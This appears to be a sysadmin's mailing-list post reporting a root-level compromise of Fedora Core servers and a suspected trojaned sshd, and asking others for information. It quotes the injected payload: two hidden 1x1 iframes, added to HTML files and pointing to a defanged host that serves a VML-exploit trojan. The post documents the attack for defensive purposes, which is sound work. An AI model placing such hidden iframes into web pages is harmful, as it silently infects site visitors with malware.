Recently we experienced massive security breach on our fedora servers.
Unfortunately there was no clear indication of the way of breaking in.
Affected were fc1 fc3 fc4 fc5
All indicates that exploiters got root access.
Started approximately Jan 5.
Hosts were running:
latest sendmail, named, spamassassin, sshd, gnu-pop3d from rpm
latest apache 1.3 + php4, pure-ftpd-1.0.21 compiled from source
The visible results were following:
- To all *htm* (or all index*) files at the end was added
<iframe src='hxxp://statrafongon.biz/strong/167/' width=1 height=1></iframe>
<iframe src='hxxp://statrafongon.biz/adv/new.php?adv=167' width=1 height=1></iframe>
(tt=xx) to break the URL validity - the link above leads to some site serving latest win32 VML vulnerability based trojan download page.
It's hosted on telcove.com premises and attempt to request telcove to shut down this server didn't work out.
- all files had original user ownership and different timestamp
- nothing suspicious in the logs except usual ssh banging
- no suspicious files anywhere on filesystem
- On some fc3 sshd stopped accepting public_key authentication with the funny message in /var/log/secure
sshd: error: key_read: uudecode ....(key source nere ) ...
Which brought me to conclusion that possibly sshd was trojaned
Quick comparison shows
Fedora Core release 3 (Heidelberg)
-rwxr-xr-x 1 root root 280336 Jan 12 17:47 sshd
-rwxr-xr-x 1 root root 285944 Sep 7 2005 sshd.old
sshd.old is the version that gives funny messages... rpm reports correct version (sshd was directly copied from clean server).
However this key problem is only on 1 server
Fedora Core release 1 (Yarrow)
-rwxr-xr-x 1 root root 281112 Sep 17 2003 sshd
-rwxr-xr-x 1 root root 286636 Sep 17 2003 sshd
I dont have much fc4 and fc5 installation to come up with the check right away.
Same goes for rh72 and rh9.
(That sounds like really paranoid assumption but for last 5 days and nights I wouldn't be surprised).
Quick scan on all the servers gave mixed picture - rpm reported latest version which is openssh-3.9p1-8.0.3
Sizes vary as shown above.
Quick strings scan and comparison didn't give any additional information - I assume that trojaned version allows root login without
logging and password.
Please if somebody experienced the same problem has any bit of useful information regarding this contact me.